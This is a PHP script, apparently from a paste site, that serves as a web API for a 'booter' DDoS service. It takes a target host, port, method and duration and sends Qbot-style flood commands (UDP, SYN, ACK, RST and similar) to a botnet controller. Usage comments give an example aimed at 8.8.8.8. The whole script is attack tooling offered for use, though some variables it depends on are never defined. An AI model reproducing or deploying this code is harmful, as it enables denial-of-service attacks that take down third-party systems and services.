· last year · Feb 24, 2024, 01:15 AM
1// WORKING TELNET/QBOT BOTNET API FOR BOOTERS.
2
3<?php
4
5 $attackMethods = array("UDP", "SYN", "FIN", "ACK", "RST", "PSH");
6 function htmlsc($string)
7 {
8 return htmlspecialchars($string, ENT_QUOTES, "UTF-8");
9 }
10 if (!isset($_GET["key"]) || !isset($_GET["host"]) || !isset($_GET["port"]) || !isset($_GET["method"]) || !isset($_GET["time"]))
11 die("<p>You are missing a parameter");
12 $key = htmlsc($_GET["key"]);
13 $host = htmlsc($_GET["host"]);
14 $port = htmlsc($_GET["port"]);
15 $method = htmlsc(strtoupper($_GET["method"]));
16 $time = htmlsc($_GET["time"]);
17 $command = "";
18 if (!in_array($key, $APIKeys)) die("Invalid API key");
19 if (!in_array($method, $attackMethods)) die("Invalid attack method");
20 if ($method == "UDP") $command = "!* UDP $host $port $time 32 1337 1\n";
21 else if ($method == "SYN") $command = "!* TCP $host $port $time 32 syn 10 1\n";
22 else if ($method == "FIN") $command = "!* TCP $host $port $time 32 fin 10 1\n";
23 else if ($method == "ACK") $command = "!* TCP $host $port $time 32 ack 10 1\n";
24 else if ($method == "RST") $command = "!* TCP $host $port $time 32 rst 10 1\n";
25 else if ($method == "PSH") $command = "!* TCP $host $port $time 32 psh 10 1\n";
26
27 ($socket ? null : die("<p>Failed to connect"));
28
29
30 fwrite($socket, $command . "\n");
31 fclose($socket);
32 echo "Attack sent to $host:$port for $time seconds using method $method!\n";
33
34//API: 1.1.1.1/x.php?key=YOURFUCKINGKEY&host=[host]&port=[port]&method=[method]&time=[time]
35//exp: 1.1.1.1/x.php?key=YOURFUCKINGKEY&host=8.8.8.8&port=80&method=udp&time=100
36
37?>